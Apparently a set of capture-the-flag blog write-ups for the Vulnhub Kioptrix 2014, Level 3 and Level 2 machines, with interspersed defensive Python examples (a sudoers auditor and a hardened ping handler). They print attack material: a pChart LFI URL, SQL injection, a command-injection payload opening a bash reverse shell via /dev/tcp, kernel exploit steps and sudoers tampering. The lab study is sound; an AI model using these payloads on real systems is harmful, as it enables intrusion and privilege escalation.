OSCP like Vulnhub machines: Kioptrix: 2014

Download VM

Kioptrix 2014 is an intermediate-level Boot2Root VM, released as part of the Kioptrix series of VMs. Kioptrix 2014 was an incredible machine for me, since it forced me to get out of my usual routines and go the extra mile to gain the initial foothold, but the privesc was fairly straightforward.

Let’s start the enumeration process with netdiscover.

netdiscover -Lr 192.168.1.0/24

Here 192.168.1.0/24 is my home network’s range, -L keeps listening and -r specifies the range.

That command revealed the target’s IP address as 192.168.1.4.

We are going to start the enumeration with an Nmap scan.

nmap -sCV -v -oN tcp 192.168.1.4

And the output is as follows.

Nmap scan report for 192.168.1.4
Host is up (0.00018s latency).
Not shown: 997 filtered ports
PORT     STATE  SERVICE VERSION
22/tcp   closed ssh
80/tcp   open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
|_http-title: Site doesn't have a title (text/html).
8080/tcp open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
| http-methods: 
|_  Supported Methods: GET
|_http-title: 403 Forbidden
MAC Address: AA:22:CC:44:DD:66 (VMware)

There were two Apache web servers running on ports 80 and 8080, and an SSH service. The Apache banner was leaking the OS variant as FreeBSD. Given the distro and the Apache version information, a little googling gave me a possible OS version of FreeBSD 9.0.

Port 80 showed the default “It works!” Apache page.

Let’s check the web site running on port 8080.

Oops

The web site running on port 8080 was forbidden to us for some reason. This usually happens because the Apache configuration is set up that way. A sample configuration is listed below.

<Directory "/usr/local/www/apache22/data2">
    Options Indexes FollowSymLinks
    AllowOverride All
    Order allow,deny
    Allow from 192.168.1.2
</Directory>

In the above sample apache2.conf entry, the server will only allow requests from the IP address 192.168.1.2 and will discard every request from any other IP address. Let’s keep this information in the back of our heads for now.

Moving on..

I bruteforced both web sites without any interesting results. Since we still did not have an initial foothold even after bruteforcing, I decided to look at the source code of the web site running on port 80.

And there was a clue pointing to a pChart web service in the source code.

Navigating to the said URL showed me the following page.

I dug around the website and found nothing interesting. But searchsploit-ing the pChart version proved fruitful, as there existed a directory traversal / LFI vulnerability!

LFI vulnerability in EDB -ID 31173

As per exploit-db, the vulnerability can be exploited by requesting the following URL.

hxxp://localhost/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd

Since our server has pChart in a different folder, I changed the URL to the following.

http://192.168.1.4/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd

And we’ve got the contents of /etc/passwd on the server!

We are off to a great start! Or so I thought.


My initial plan was to try to get a remote shell using log poisoning. But FreeBSD does not follow the same conventions as Linux, and things differ in several aspects, including the location of the log file.

I looked up the location of the Apache access log, found it to be /var/log/httpd-access.log, and successfully used the vulnerability discovered above to view the contents of the file.

But no matter what I tried, I couldn’t find a way to execute code through log poisoning. My poison code was showing up in the logs, but some pre-processing was taking place before the data was written to the log file. So there was no way to execute my poisoning code without bypassing that filter.

I tried several iterations of the PHP poison code, but none of them worked. All the quote characters were escaped by the pre-processing. So I decided to move on.

Moving on..

I was stuck at this point. I had no idea how to proceed from here, except to continue bruteforcing and digging around the server using the LFI vulnerability. So I decided to do just that.

We only had three services running on the target: SSH on port 22 and two web servers on ports 80 and 8080, where port 8080 was inaccessible to us. As discussed above, this was configured in the Apache configuration file.

But since we are dealing with FreeBSD, the file name and location differed. I looked up the configuration file location and found it at /usr/local/etc/apache22/httpd.conf.

Examining the Apache configuration file was fruitful, as it showed the following (weird) configuration.

Only requests with a specific UA were given access to the server on port 8080

So I installed a Firefox add-on called User-Agent Switcher by Alexander Schlarb, added a custom User-Agent string and navigated to the web server running on port 8080.

And I’ve found a directory
A web service named phptax was running there

Searchsploit-ing the name phptax showed me the following results.

There were some vulnerabilities for Phptax v0.8

I decided to try the manual exploits before resorting to the Metasploit module. I knew it was harder, but where is the learning experience in exploiting the easy way?

I was able to exploit phptax both the manual way and the MSF way. Let’s discuss how I exploited the machine using each of them.

Method #1: Exploitation using a manual exploit.

I knew that I needed to modify the exploit to accommodate the special condition (the weird UA string) for it to work. With some struggling, I modified an RCE script I found on carnal0wnage’s GitHub repo to work with Kioptrix 2014. Actually, I made two scripts: a Python 2 one and a Python 3 one.

Along with the UA string, I also swapped the payload in the original script to accommodate two separate payloads in my version, as the original bind shell payload wasn’t working for me. The payload can be selected by passing the command line argument 1 or 2 to the script.

The first payload in my version of the phptax_rce script uses the netcat-without--e reverse shell method, and the second uses telnet to spawn a reverse shell. The second (telnet) payload is a modified version of the payload used by the Phptax MSF module.

You can find the modified scripts in my GitHub repo.

Running the modified version of the phptax_rce script
And we got the reverse shell!

Keep in mind that when using an nc listener, I had to use the -k flag, because without it the shell would sometimes die upon receiving the connection back. This mostly happened when I used the telnet payload, so it would be better to stick with the nc-without--e payload.

Method #2: Exploitation using the MSF module.

Exploitation using the phptax_exec MSF module was fairly straightforward for me, except for the fact that we have to modify the UA string. As far as I know, there isn’t a built-in option inside MSF to swap the User-Agent string without fiddling with the module’s script. To keep things simple, I decided to alter the User-Agent on the fly using Burp Suite.

So I set the PROXIES option to redirect the traffic to Burp Suite and set the ReverseAllowProxy option to true. We set ReverseAllowProxy to true because, by default, MSF doesn’t allow TCP connect-back payloads when proxies are specified; setting it to true overrides this behavior.

Available options in phptax_exec module

Along with the usual options, we had to specify a payload before running this module, which, by the way, was not mentioned anywhere in the module. If we run the module without specifying a payload, there will be an error.

Also, the payload should be selected by typing set payload and pressing <tab>, letting autocompletion list the available payloads. We use tab completion instead of explicitly specifying a payload because this module only supports a handful of payloads and we want to see that list.

Selecting a payload in phptax_exec module

As you can see from the above image, I selected the cmd/unix/reverse payload.

set payload cmd/unix/reverse

Now, when I executed the module with run -j, Burp Suite captured the traffic and I changed the User-Agent string.

Changing the User Agent string via Burp Suite

And once I forwarded the request, I got a connection back!

Moving on to Privilege escalation…

Now, I knew the OS version was an old one and chances were high that there was a kernel exploit for it. But I decided to try that later and first explore the machine for any vulnerabilities I could exploit manually.

I tried different things on the machine. I ran the linpeas script, manually went through different directories; you know, the usual stuff.

But I couldn’t find any manual vector to escalate privileges. The linpeas output showed the presence of gcc on the machine, which suggested that this box was probably meant to be rooted using a kernel exploit. So I searchsploit-ed FreeBSD 9.0 and found a kernel exploit for it: FreeBSD 9.0 < 9.1 – ‘mmap/ptrace’ Local Privilege Escalation [EDB-ID 26368].

I transferred the 26368.c file using nc, compiled it with gcc and got root!

Woot!

There was a congratulation.txt flag in the /root directory, which explained the tools and technologies used by the author; a nice touch! Kudos to loneferret for this machine and for going the extra mile.

Loneferret also created a custom script to monitor and log modified directories and files. He also installed OSSEC-HIDS, an IDS for monitoring and logging attacks. This gives us an idea of how noisy the attacks are from a blue team perspective.

Overall this was a great VM to learn pentesting and it was indeed a great learning experience for me!

OSCP like Vulnhub machines: Kioptrix: Level 1.2 (#3)

Download VM

As always, we are going to start the attack by identifying the device using

netdiscover -Lr 192.168.1.0/24

Here 192.168.1.0/24 is my home network’s range, -L keeps listening and -r specifies the range.

That command revealed the target’s IP address as 192.168.1.4.

We are going to start the enumeration with an Nmap scan.

nmap -sCV -v -oN tcp 192.168.1.4

And the output is as follows.

Nmap scan report for 192.168.1.4
Host is up (0.0013s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 
|   1024 AA:22:CC:44:DD:66:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_  2048 AA:22:CC:44:DD:66:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-favicon: Unknown favicon MD5: 99EFC00391F142252888403BB1C196D2
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Ligoat Security - Got Goat? Security ...
MAC Address: AA:22:CC:44:DD:66 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We can see that there are two services running on the target machine. Let’s check out the website the target machine is running.

Further enumeration of the website showed a blog, on which we can comment by including a URL.

Comment section on blog page

I tried posting a URL after starting the http.server Python module, to see if we get a request back from the target. But it didn’t work.

Rabbit holes everywhere!

Moving on to the login page.

I tried the usual SQL injection techniques, with no success. But I noticed the banner provided on the login page.

Searchsploit-ing the name returned some results.

Potential vulnerabilities for the CMS

But, as we can see, there is no mention of Lotus CMS’s version anywhere on the website. I tried looking at the source code for any mention of the CMS version, but there wasn’t any. So let’s try to find an approximate version of the operating system and match it with the Lotus CMS version.

From a quick Google search with the PHP banner, we can see that the package dates back to 2008-2009.

With this information in mind, let’s examine the searchsploit results one by one.

And we’ve found one.

The environment mentioned in the exploit matches our target machine’s services. Let’s verify whether Lotus CMS version 3.0 (mentioned in the exploit) was released around the package date we enumerated earlier.

LotusCMS on sourceforge

Lotus CMS version 3.0 was uploaded around 2011. This information can’t be used to arrive at a solid conclusion, but there is a high chance that the target machine is not running Lotus CMS version 3.0. However, since the target machine’s environment matches our exploit and this is a CTF challenge, it is safe to assume that this exploit will work.

I tried running the above exploit (15964.py); however, it failed miserably.


Moving on…

I decided to Google a bit to find whether there was any GitHub repo with another (hopefully fixed) version of this same exploit. With a simple Google search, I found this GitHub repo with both a bash version and a Ruby version of the Lotus CMS RCE exploit.

There was a little easter egg in this exploit, reassuring us that this is indeed the intended exploit. 😛

I executed the exploit using the following command.

ruby lotusRCE.rb -t 192.168.1.4 -p /

Running LotusCMS RCE exploit

And we got a shell back! So the target was indeed running Lotus CMS 3.0. It was just an issue with the exploit code we used.

We are now www-user!

I tried to upgrade my shell from a dumb shell to a full TTY shell. But even after I did, for some reason I couldn’t use tab completion and some errors were not showing up.

Anyway, I tried to dig around the www directory to find any exposed passwords. But the directory structure was too weird and, with the dumb shell I had, it was taking too much time.

Even grep didn’t give any output. I didn’t know if my syntax was messed up or if it was something with the dumb shell. So I decided to use an enumeration script. This time I went with the LinPEAS script instead of LinEnum.sh, since LinPEAS is more extensive and has pretty kawaii output. That turned out to be a pretty wise decision!

I found out that there is a MySQL server running, listening for connections from localhost only.

LinPEAS also found the password in the PHP config file (which I couldn’t) pretty easily.

Pretty rude password, but ok.

I tried this password to log into MySQL as the root user.

mysql -u root -p
> fuckeyou

And we’ve successfully logged in!

Digging around the databases was fruitful, as we found the password hashes for two users.

Results from the LinPEAS script suggested that these users are also local users on this machine.

So it is only logical to crack these hashes and use them to log into their accounts.

Using hashid showed me that the hash could be MD5. So I used md5online.org to crack the hash.

I then logged in to user loneferret's account via SSH with the cracked password.

Issuing the command sudo -l as loneferret showed us the following output.

This means that we can run the program ht as the superuser, but we cannot run su.

Let’s try the ht command.

sudo ht

I couldn’t execute the binary since the terminal type I used wasn’t installed on the target. Let’s enumerate the available terminals on the target.

ls -R /usr/share/terminfo

Available terminals in target

The target has the xterm terminal installed. Xterm is preinstalled in Kali Linux, so let’s open an xterm terminal and log in to the target.

Opening Xterm
Logging in via SSH
Output of sudo ht command

As we can see, the ht command opened an editor program. A little bit of googling showed us that the program is called HT Editor, which is used to edit binary files.

My first thought was to create an authorized_keys file in root’s folder, but I couldn’t navigate through the application with the mouse due to an unknown error. Also, no key combination was set in HT Editor to create a new file (most probably the program lacks this feature), forcing me to reject the idea of writing to root’s SSH folder.

I could, however, open folders and files that already existed. I could even view the contents of the root folder! (And obviously the flag Congratulations.txt; but that’s no fun, is it?!)

I tried viewing the hash of the root user by opening /etc/shadow and cracking it. But after an hour of cracking attempts, I gave up.

I failed to escalate privileges by myself, so I looked at other writeups on Kioptrix-3 and found out that we can actually edit the /etc/sudoers file to escalate privileges.

In the walkthrough, what they did was edit the /etc/sudoers file to add a new binary path (/bin/bash) to the loneferret user’s entry.

This was new information for me!

However, my ego was too high to blindly follow the walkthrough. I wanted to come up with something on my own.

My first idea was to change the

!/usr/bin/su

to the following

/usr/bin/su

But unfortunately, it didn’t work. Ouch!

So I followed the steps mentioned in the walkthrough.

I pressed F3 to open a file and entered the absolute path of the sudoers file, /etc/sudoers, into the HT editor. I added /bin/bash (separated by a comma) to the line corresponding to loneferret, saved it with F2, exited the HT editor with F10 and issued sudo /bin/bash on the command line.
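The privesc above works because a sudo rule that lets a user run an editor as root lets that user rewrite /etc/sudoers itself, so the “!/usr/bin/su” exclusion protects nothing. The following is an added example (not code from the post or the Kioptrix VM): a small sudoers auditor that flags such rules; the sample sudoers text is constructed, and the ht path /usr/local/bin/ht is an assumption.

```python
"""Flag sudo rules that hand out an editor or other file-writing tool as root.

Added example, not part of the original post. Parses a sudoers-style text and
reports rules whose allowed commands can read/write arbitrary files, noting
when '!' exclusions (like the post's '!/usr/bin/su') are therefore ineffective.
"""
import os
import re
from typing import List, NamedTuple

# Programs that let the invoking user read/write arbitrary files or spawn a
# shell when run as root. Not exhaustive; extend for your environment.
FILE_WRITING_TOOLS = {
    "ht", "vi", "vim", "nano", "emacs", "less", "more", "tee", "cp", "mv",
    "dd", "find", "awk", "sed", "python", "perl", "bash", "sh",
}


class Rule(NamedTuple):
    user: str
    hosts: str
    runas: str
    tags: List[str]        # e.g. ["NOPASSWD"]
    commands: List[str]    # '!' prefix kept on exclusions


class Finding(NamedTuple):
    user: str
    command: str
    reason: str


# user  hosts = (runas) tag: cmd, cmd ...   (runas part optional)
_RULE = re.compile(
    r"^(?P<user>\S+)\s+(?P<hosts>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<rest>.+)$"
)
_TAG = re.compile(r"^([A-Z]+):\s*")


def parse_sudoers(text: str) -> List[Rule]:
    """Parse user-specification lines; Defaults and alias lines are skipped."""
    rules: List[Rule] = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments
        if not line or line.startswith("Defaults") or "_Alias" in line:
            continue
        m = _RULE.match(line)
        if not m:
            continue
        rest = m.group("rest")
        tags: List[str] = []
        while True:                              # leading tags such as NOPASSWD:
            t = _TAG.match(rest)
            if not t:
                break
            tags.append(t.group(1))
            rest = rest[t.end():]
        commands = [c.strip() for c in rest.split(",") if c.strip()]
        rules.append(Rule(m.group("user"), m.group("hosts"),
                          m.group("runas") or "root", tags, commands))
    return rules


def audit(rules: List[Rule]) -> List[Finding]:
    """Report rules granting ALL, or a tool from FILE_WRITING_TOOLS, as another user."""
    findings: List[Finding] = []
    for rule in rules:
        allowed = [c for c in rule.commands if not c.startswith("!")]
        excluded = [c[1:].strip() for c in rule.commands if c.startswith("!")]
        for cmd in allowed:
            if cmd == "ALL":
                findings.append(Finding(rule.user, cmd,
                                        f"unrestricted: any command as {rule.runas}"))
                continue
            prog = os.path.basename(cmd.split()[0])
            if prog in FILE_WRITING_TOOLS:
                reason = f"{prog} can read/write arbitrary files as {rule.runas}"
                if excluded:
                    # An editor can rewrite /etc/sudoers, so exclusions are moot.
                    reason += "; exclusions (" + ", ".join(excluded) + ") are ineffective"
                if "NOPASSWD" in rule.tags:
                    reason += "; no password required"
                findings.append(Finding(rule.user, cmd, reason))
    return findings


# Constructed sample modelled on the rule described in the post. The ht path is
# an assumption; the '!/usr/bin/su' exclusion is the one the post mentions.
SAMPLE_SUDOERS = """\
Defaults    env_reset
root        ALL=(ALL) ALL
loneferret  ALL=NOPASSWD: !/usr/bin/su, /usr/local/bin/ht
www-data    ALL=(ALL) NOPASSWD: /usr/bin/apt-get update
"""

if __name__ == "__main__":
    for f in audit(parse_sudoers(SAMPLE_SUDOERS)):
        print(f"{f.user}: {f.command} -> {f.reason}")
```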

And we’re root!

Not my proudest moment, but hey, we learned something new! So it’s a win-win situation! 😅

Flag on Kioptrix 3

For me this was a greater learning experience than the previous Kioptrix boxes. Woot woot!

OSCP like Vulnhub machines: Kioptrix: Level 1.1 (#2)

Kudos to abatchy’s blog for compiling this list.

Download VM

We are going to start by identifying the device using

netdiscover -Lr 192.168.1.0/24

Here 192.168.1.0/24 is my home network’s range, -L keeps listening and -r specifies the range.

That command revealed the target’s IP address as 192.168.1.10.

As usual, we are going to start the enumeration with an Nmap scan.

nmap -sCV -v -oN tcp 192.168.1.10

And the output is as follows.

Nmap scan report for 192.168.1.10
Host is up (0.0024s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey: 
|   1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
|   1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_  1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http       Apache httpd 2.0.52 ((CentOS))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp  open  rpcbind    2 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1            627/udp   status
|_  100024  1            630/tcp   status
443/tcp  open  ssl/https?
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Issuer: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: md5WithRSAEncryption
| Not valid before: 2009-10-08T00:10:47
| Not valid after:  2010-10-08T00:10:47
| MD5:   01de 29f9 fbfb 2eb2 beaf e624 3157 090f
|_SHA-1: 560c 9196 6506 fb0f fb81 66b1 ded3 ac11 2ed4 808a
|_ssl-date: 2020-12-14T11:11:35+00:00; -2h09m37s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|_    SSL2_RC2_128_CBC_WITH_MD5
631/tcp  open  ipp        CUPS 1.1
| http-methods: 
|   Supported Methods: GET HEAD OPTIONS POST PUT
|_  Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
3306/tcp open  mysql      MySQL (unauthorized)

We can see there is an HTTP website and an HTTPS website running on the target. Inspecting them in the browser showed a webpage like the following.

Website running on Kioptrix

Since this is an easy machine, I pulled up one of the oldest but greatest hacking tricks in a hacker’s sleeve: SQL injection.

'OR 1=1--

Trying SQL injection on Kioptrix’s login page

It worked like a charm! But that was unsurprising, as this is intended to be an easy machine.

We were presented with a web console after the successful SQL injection

The web console was intended to ping any machine on the network and give us the results. Entering an IP address in the console presented us with a familiar output.

Output of ping

The output is exactly the same as the output of the ping tool on Linux. So it is safe to assume that the web page is working as a frontend and passing the IP parameter to the ping tool.

The PHP code to perform this would look like the following.

<?php
$ip = $_REQUEST['ip'];                 // Read the user's IP input from the text box
echo shell_exec('ping -c 4 ' . $ip);   // The unsanitized input is passed straight to shell_exec()

So, if the frontend developer didn’t code securely (as in the code above), then we can perform an OS command injection.

To perform an OS command injection, we can use the semicolon character (;) to terminate the ping command and inject our own command.

So, if we pass the value

192.168.1.2;whoami

We will get the following output.

OS command injection successful

We can see that the OS command injection was successful, as the output of the whoami command is also shown.
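The fix for this class of bug is to stop treating the parameter as shell text: validate it as an IP address and run ping without a shell. The following is an added example (not code from the post or the Kioptrix VM) that puts a Python equivalent of the vulnerable concatenation next to a hardened handler, and adds a check over constructed access-log lines for the “;” style payload shown above. The path /console.php and the log lines are constructed for the example.

```python
"""Vulnerable vs. hardened ping handler, plus an access-log check.

Added example, not part of the original post. The post's PHP concatenates
$_REQUEST['ip'] into shell_exec(); vulnerable_command() mirrors that, while
safe_command() rejects anything that is not a bare IP and builds an argv list
so no shell ever interprets the value.
"""
import ipaddress
import re
import subprocess
from typing import List, Tuple
from urllib.parse import parse_qs, urlsplit


class InvalidTarget(ValueError):
    """Raised when the submitted 'ip' value is not a plain IP address."""


def vulnerable_command(user_ip: str) -> str:
    """Same pattern as the post's PHP: the input becomes part of a shell string."""
    return "ping -c 4 " + user_ip


def validate_target(user_ip: str) -> str:
    """Allow-list check: the value must parse as an IPv4 or IPv6 address."""
    try:
        return str(ipaddress.ip_address(user_ip.strip()))
    except ValueError as exc:
        raise InvalidTarget(f"not an IP address: {user_ip!r}") from exc


def safe_command(user_ip: str) -> List[str]:
    """argv list for ping; ';' or '|' can no longer split off a second command."""
    return ["ping", "-c", "4", validate_target(user_ip)]


def run_ping(user_ip: str) -> str:
    """Execute the hardened command without a shell (not exercised by the tests)."""
    result = subprocess.run(safe_command(user_ip), capture_output=True,
                            text=True, timeout=30)
    return result.stdout + result.stderr


# Characters that have no place in an IP parameter but are meaningful to a shell.
_SHELL_META = re.compile(r"[;&|`$<>(){}\n]")
# Common Log Format prefix: client, ident, user, [time], "METHOD path HTTP/x"
_CLF = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')


def suspicious_ip_params(log_lines: List[str]) -> List[Tuple[str, str]]:
    """Return (client, decoded 'ip' value) for requests carrying shell metacharacters.

    Only query strings are visible in the access log; if the console posts its
    form, the value never appears here and server-side validation is the only
    control that sees it.
    """
    hits: List[Tuple[str, str]] = []
    for line in log_lines:
        m = _CLF.match(line)
        if not m:
            continue
        client, path = m.groups()
        for value in parse_qs(urlsplit(path).query).get("ip", []):
            if _SHELL_META.search(value):
                hits.append((client, value))
    return hits


# Constructed log lines; /console.php is a placeholder for the ping frontend.
SAMPLE_LOG = [
    '192.168.1.9 - - [14/Dec/2020:11:20:01 +0000] "GET /console.php?ip=192.168.1.2 HTTP/1.1" 200 512',
    '192.168.1.9 - - [14/Dec/2020:11:20:45 +0000] "GET /console.php?ip=192.168.1.2%3Bwhoami HTTP/1.1" 200 530',
    '192.168.1.9 - - [14/Dec/2020:11:21:10 +0000] "GET /index.php HTTP/1.1" 200 1400',
]

if __name__ == "__main__":
    print(vulnerable_command("192.168.1.2;whoami"))   # the whole string reaches the shell
    print(safe_command("192.168.1.2"))
    print(suspicious_ip_params(SAMPLE_LOG))
```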

Now we can use a bash reverse shell one-liner from PayloadsAllTheThings, and our payload becomes the following.

192.168.1.2; bash -i >& /dev/tcp/192.168.1.9/9001 0>&1

Here, 192.168.1.9 is our attacking Kali machine and 9001 is the listening port.

rlwrap nc -lvnp 9001 

I started a netcat listener and passed the payload in the web console. Here rlwrap is used to make ‘dumb’ reverse shells a little more tolerable. Putting rlwrap in front of the nc listener gives the reverse shell capabilities like command history and moving between characters with the arrow keys.

But keep in mind that rlwrap is NOT EQUAL TO, or a viable replacement for, spawning an actual TTY shell. It is only used to make interactions with a dumb shell a little more comfortable.

And by passing the above payload to the web console, we got a reverse shell back from the target!

Got Reverse Shell!

Now that we have the initial foothold on the machine, let’s begin the local enumeration process.

In the /var/www/html directory, I found the two files responsible for the web console. Inspecting the files gave us credentials for the MySQL service running on the target machine.

Exposed MySQL db credentials in the index.php file

I logged in to the MySQL service using these credentials, but I couldn’t see the output, since we were not in an actual TTY shell. That means we have to upgrade our dumb shell to a full TTY shell.

Let’s see whether the machine has Python using the command which python. Lucky for me, Python was already installed on the machine. Let’s upgrade the shell now using the following Python one-liner.

python -c 'import pty;pty.spawn("/bin/bash")'

And we’ve successfully upgraded the shell to a full TTY shell. We can check whether our current shell is a TTY by issuing the tty command.

Upgrading to TTY shell

Now let’s log in to MySQL using the following command. The password will be prompted for after entering this command.

mysql -u john -p

Enumerating the database didn’t provide any fruitful results except these credentials and the fact that john’s password is also used for the MySQL root account.

Contents of the users table

I tried logging into SSH with these credentials to test for password reuse, but it was futile. Oh well!

Moving on…

Let’s enumerate the system for possible privesc routes. I used the trusty old LinEnum.sh script for enumerating the machine. I started a Python web server using python -m http.server 80 on my Kali machine and issued wget http://192.168.1.9/LinEnum.sh on the target machine to download the enumeration script.

And while the script is running, let’s check the target’s distribution version by issuing the following commands.

lsb_release -a
uname -a

Target is running CentOS 4.5, which dates back to 2007

So it is an old (obsolete, to be fair) version of CentOS, and I am pretty sure that there are tons of privilege escalation exploits for this version.

So let’s find the possible exploits for this version. I am using the distribution name and kernel version (2.6) as the query.

searchsploit centos 2.6

Potential kernel exploits for the target

The second-to-last result sounds promising, since our kernel version is 2.6.55 and the exploit is for kernels ranging from 2.6.32 to 3.x. The exploit-db ID is 9542.

Let’s examine the exploit contents by using the following command.

searchsploit -x 9542

Contents of 9542.c

This exploit does look promising and the compilation is rudimentary.

Now, let’s copy the exploit to our present working directory using the following command.

searchsploit -m 9542

Now we could try exploiting this right away. But since we are in this for learning purposes, let’s take things slow, as I want to see if there are additional privilege escalation vectors intended by the creator; and of course manual exploitation is way more satisfying.

Using a kernel vulnerability to escalate privileges always makes me feel a little bit guilty.

The output of the LinEnum script is given at the end of this post as it is too long.

Unfortunately, I didn’t find any valid privesc routes. There was an ESMTP server running on localhost, and the CUPS service (which we found in the Nmap scan) also looked promising; but exploitation attempts on both services failed. So they must’ve been rabbit holes!

Moving On..

Let’s move on to the kernel exploit we found earlier. From the LinEnum.sh output, I had already seen that the target machine has gcc. So the only remaining step is to move the exploit to the target machine and compile it.

Change the working directory to /tmp and download the exploit to the target, just like we did before (combo of the http.server Python module and wget).

Compile the exploit with gcc 9542.c -o exploit and run it with ./exploit.

And we are root!

The output of LinEnum.sh is given below:


#########################################################
# Local Linux Enumeration & Privilege Escalation Script #
#########################################################
# www.rebootuser.com
# version 0.982

[-] Debug Info
[+] Thorough tests = Disabled


Scan started at:
Fri Dec 18 23:36:25 EST 2020

### SYSTEM ##############################################
[-] Kernel information:
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 athlon i386 GNU/Linux


[-] Kernel information (continued):
Linux version 2.6.9-55.EL (mockbuild@builder6.centos.org) (gcc version 3.4.6 20060404 (Red Hat 3.4.6-8)) #1 Wed May 2 13:52:16 EDT 2007


[-] Specific release information:
CentOS release 4.5 (Final)


[-] Hostname:
kioptrix.level2


### USER/GROUP ##########################################
[-] Current user/group info:
uid=48(apache) gid=48(apache) groups=48(apache)


[-] Who else is logged on:
 23:36:25 up 12 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT


[-] Group memberships:
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
uid=1(bin) gid=1(bin) groups=1(bin),2(daemon),3(sys)
uid=2(daemon) gid=2(daemon) groups=2(daemon),1(bin),4(adm),7(lp)
uid=3(adm) gid=4(adm) groups=4(adm),3(sys)
uid=4(lp) gid=7(lp) groups=7(lp)
uid=5(sync) gid=0(root) groups=0(root)
uid=6(shutdown) gid=0(root) groups=0(root)
uid=7(halt) gid=0(root) groups=0(root)
uid=8(mail) gid=12(mail) groups=12(mail)
uid=9(news) gid=13(news) groups=13(news)
uid=10(uucp) gid=14(uucp) groups=14(uucp)
uid=11(operator) gid=0(root) groups=0(root)
uid=12(games) gid=100(users) groups=100(users)
uid=13(gopher) gid=30(gopher) groups=30(gopher)
uid=14(ftp) gid=50(ftp) groups=50(ftp)
uid=99(nobody) gid=99(nobody) groups=99(nobody)
uid=81(dbus) gid=81(dbus) groups=81(dbus)
uid=69(vcsa) gid=69(vcsa) groups=69(vcsa)
uid=37(rpm) gid=37(rpm) groups=37(rpm)
uid=68(haldaemon) gid=68(haldaemon) groups=68(haldaemon)
uid=34(netdump) gid=34(netdump) groups=34(netdump)
uid=28(nscd) gid=28(nscd) groups=28(nscd)
uid=74(sshd) gid=74(sshd) groups=74(sshd)
uid=32(rpc) gid=32(rpc) groups=32(rpc)
uid=47(mailnull) gid=47(mailnull) groups=47(mailnull)
uid=51(smmsp) gid=51(smmsp) groups=51(smmsp)
uid=29(rpcuser) gid=29(rpcuser) groups=29(rpcuser)
uid=65534(nfsnobody) gid=65534(nfsnobody) groups=65534(nfsnobody)
uid=77(pcap) gid=77(pcap) groups=77(pcap)
uid=48(apache) gid=48(apache) groups=48(apache)
uid=23(squid) gid=23(squid) groups=23(squid)
uid=67(webalizer) gid=67(webalizer) groups=67(webalizer)
uid=43(xfs) gid=43(xfs) groups=43(xfs)
uid=38(ntp) gid=38(ntp) groups=38(ntp)
uid=66(pegasus) gid=65(pegasus) groups=65(pegasus)
uid=27(mysql) gid=27(mysql) groups=27(mysql)
uid=500(john) gid=500(john) groups=500(john)
uid=501(harold) gid=501(harold) groups=501(harold)


[-] It looks like we have some admin users:
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
uid=2(daemon) gid=2(daemon) groups=2(daemon),1(bin),4(adm),7(lp)
uid=3(adm) gid=4(adm) groups=4(adm),3(sys)


[-] Contents of /etc/passwd:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
